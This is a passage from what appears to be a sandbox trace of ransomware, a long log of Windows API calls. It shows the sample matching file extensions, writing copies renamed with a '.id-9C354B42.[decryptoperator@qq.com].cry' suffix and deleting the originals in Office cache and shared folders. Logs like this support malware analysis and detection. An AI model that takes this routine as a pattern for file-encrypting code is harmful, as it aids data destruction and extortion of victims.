[0036.306] lstrlenW (lpString=".rar") returned 4 [0036.306] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.306] lstrlenW (lpString=".bz2") returned 4 [0036.306] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.306] lstrlenW (lpString=".7z") returned 3 [0036.306] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.306] lstrlenW (lpString=".dbf") returned 4 [0036.306] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString=".1cd") returned 4 [0036.307] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString=".jpg") returned 4 [0036.307] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString=".doc") returned 4 [0036.307] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString=".docx") returned 5 [0036.307] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0036.307] lstrlenW (lpString=".pdf") returned 4 [0036.307] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString=".xls") returned 4 [0036.307] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString=".xlsx") returned 5 [0036.307] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0036.307] lstrlenW (lpString=".ppt") returned 4 [0036.307] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString=".zip") returned 4 [0036.307] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.307] lstrlenW (lpString=".rar") returned 4 [0036.307] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString=".bz2") returned 4 [0036.307] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString=".7z") returned 3 [0036.307] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString=".dbf") returned 4 [0036.307] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString=".1cd") returned 4 [0036.307] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0036.307] lstrlenW (lpString=".jpg") returned 4 [0036.307] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.308] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.308] lstrlenW (lpString="Office32WW.xml") returned 14 [0036.308] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.128] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=4274) returned 1 [0037.128] CloseHandle (hObject=0x1a8) returned 1 [0037.128] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0037.128] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.128] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0037.128] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.128] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.129] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0037.129] GetLastError () returned 0x0 [0037.129] ReadFile (in: hFile=0x1a8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0037.389] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0037.390] ReadFile (in: hFile=0x1a8, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.390] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0037.390] SetEndOfFile (hFile=0x174) returned 1 [0037.390] CloseHandle (hObject=0x174) returned 1 [0037.391] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.391] SetEndOfFile (hFile=0x1a8) returned 1 [0037.392] CloseHandle (hObject=0x1a8) returned 1 [0037.392] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.392] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0037.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.392] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.392] lstrlenW (lpString=".doc") returned 4 [0037.392] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.392] lstrlenW (lpString=".docx") returned 5 [0037.392] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.392] lstrlenW (lpString=".pdf") returned 4 [0037.392] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.392] lstrlenW (lpString=".xls") returned 4 [0037.392] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.392] lstrlenW (lpString=".xlsx") returned 5 [0037.393] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.393] lstrlenW (lpString=".ppt") returned 4 [0037.393] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.393] lstrlenW (lpString=".zip") returned 4 [0037.393] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.393] lstrlenW (lpString=".rar") returned 4 [0037.393] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString=".bz2") returned 4 [0037.393] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString=".7z") returned 3 [0037.393] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.393] lstrlenW (lpString=".dbf") returned 4 [0037.393] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.393] lstrlenW (lpString=".1cd") returned 4 [0037.393] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.393] lstrlenW (lpString=".jpg") returned 4 [0037.393] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.393] lstrlenW (lpString=".doc") returned 4 [0037.393] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString=".docx") returned 5 [0037.393] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.393] lstrlenW (lpString=".pdf") returned 4 [0037.393] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString=".xls") returned 4 [0037.393] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString=".xlsx") returned 5 [0037.393] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.393] lstrlenW (lpString=".ppt") returned 4 [0037.393] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.393] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.393] lstrlenW (lpString=".zip") returned 4 [0037.393] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.393] lstrlenW (lpString=".rar") returned 4 [0037.394] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.394] lstrlenW (lpString=".bz2") returned 4 [0037.394] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.394] lstrlenW (lpString=".7z") returned 3 [0037.394] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.394] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.394] lstrlenW (lpString=".dbf") returned 4 [0037.394] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.394] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.394] lstrlenW (lpString=".1cd") returned 4 [0037.394] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.394] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.394] lstrlenW (lpString=".jpg") returned 4 [0037.394] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.394] lstrcmpiW (lpString1=".EPS", lpString2=".cry") returned 1 [0037.394] lstrlenW (lpString="MS.EPS") returned 6 [0037.394] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.654] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=15067) returned 1 [0037.654] CloseHandle (hObject=0x180) returned 1 [0037.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 0x20 [0037.654] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.655] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.655] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0037.655] GetLastError () returned 0x0 [0037.655] ReadFile (in: hFile=0x180, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x3adb, lpOverlapped=0x0) returned 1 [0037.748] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x3ae0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x3ae0, lpOverlapped=0x0) returned 1 [0037.749] ReadFile (in: hFile=0x180, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.749] WriteFile (in: hFile=0x164, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0037.749] SetEndOfFile (hFile=0x164) returned 1 [0037.749] CloseHandle (hObject=0x164) returned 1 [0037.750] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.750] SetEndOfFile (hFile=0x180) returned 1 [0037.751] CloseHandle (hObject=0x180) returned 1 [0037.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0037.751] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 1 [0037.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.751] lstrlenW (lpString=".doc") returned 4 [0037.751] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0037.751] lstrlenW (lpString=".docx") returned 5 [0037.751] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0037.751] lstrlenW (lpString=".pdf") returned 4 [0037.751] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0037.751] lstrlenW (lpString=".xls") returned 4 [0037.751] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0037.751] lstrlenW (lpString=".xlsx") returned 5 [0037.751] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0037.751] lstrlenW (lpString=".ppt") returned 4 [0037.751] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0037.751] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.751] lstrlenW (lpString=".zip") returned 4 [0037.751] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0037.751] lstrlenW (lpString=".rar") returned 4 [0037.751] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0037.751] lstrlenW (lpString=".bz2") returned 4 [0037.751] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0037.751] lstrlenW (lpString=".7z") returned 3 [0037.752] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.752] lstrlenW (lpString=".dbf") returned 4 [0037.752] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.752] lstrlenW (lpString=".1cd") returned 4 [0037.752] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.752] lstrlenW (lpString=".jpg") returned 4 [0037.752] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.752] lstrlenW (lpString=".doc") returned 4 [0037.752] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0037.752] lstrlenW (lpString=".docx") returned 5 [0037.752] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0037.752] lstrlenW (lpString=".pdf") returned 4 [0037.752] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0037.752] lstrlenW (lpString=".xls") returned 4 [0037.752] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0037.752] lstrlenW (lpString=".xlsx") returned 5 [0037.752] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0037.752] lstrlenW (lpString=".ppt") returned 4 [0037.752] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.752] lstrlenW (lpString=".zip") returned 4 [0037.752] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0037.752] lstrlenW (lpString=".rar") returned 4 [0037.752] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0037.752] lstrlenW (lpString=".bz2") returned 4 [0037.752] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0037.752] lstrlenW (lpString=".7z") returned 3 [0037.752] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.752] lstrlenW (lpString=".dbf") returned 4 [0037.752] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0037.752] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.753] lstrlenW (lpString=".1cd") returned 4 [0037.753] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0037.753] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0037.753] lstrlenW (lpString=".jpg") returned 4 [0037.753] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0037.753] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0037.753] lstrlenW (lpString="boxed-split.avi") returned 15 [0037.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0038.863] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=62976) returned 1 [0038.863] CloseHandle (hObject=0x1ac) returned 1 [0038.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0038.863] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.864] lstrlenW (lpString=".doc") returned 4 [0038.864] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString=".docx") returned 5 [0038.864] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.864] lstrlenW (lpString=".pdf") returned 4 [0038.864] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString=".xls") returned 4 [0038.864] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString=".xlsx") returned 5 [0038.864] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.864] lstrlenW (lpString=".ppt") returned 4 [0038.864] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.864] lstrlenW (lpString=".zip") returned 4 [0038.864] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString=".rar") returned 4 [0038.864] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString=".bz2") returned 4 [0038.864] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString=".7z") returned 3 [0038.864] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.864] lstrlenW (lpString=".dbf") returned 4 [0038.864] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.864] lstrlenW (lpString=".1cd") returned 4 [0038.864] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.864] lstrlenW (lpString=".jpg") returned 4 [0038.864] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.864] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.865] lstrlenW (lpString=".doc") returned 4 [0038.865] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString=".docx") returned 5 [0038.865] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.865] lstrlenW (lpString=".pdf") returned 4 [0038.865] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString=".xls") returned 4 [0038.865] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString=".xlsx") returned 5 [0038.865] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.865] lstrlenW (lpString=".ppt") returned 4 [0038.865] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.865] lstrlenW (lpString=".zip") returned 4 [0038.865] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString=".rar") returned 4 [0038.865] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString=".bz2") returned 4 [0038.865] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString=".7z") returned 3 [0038.865] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.865] lstrlenW (lpString=".dbf") returned 4 [0038.865] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.865] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.865] lstrlenW (lpString=".1cd") returned 4 [0038.865] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.865] lstrlenW (lpString="C:\\Program Files\\Common 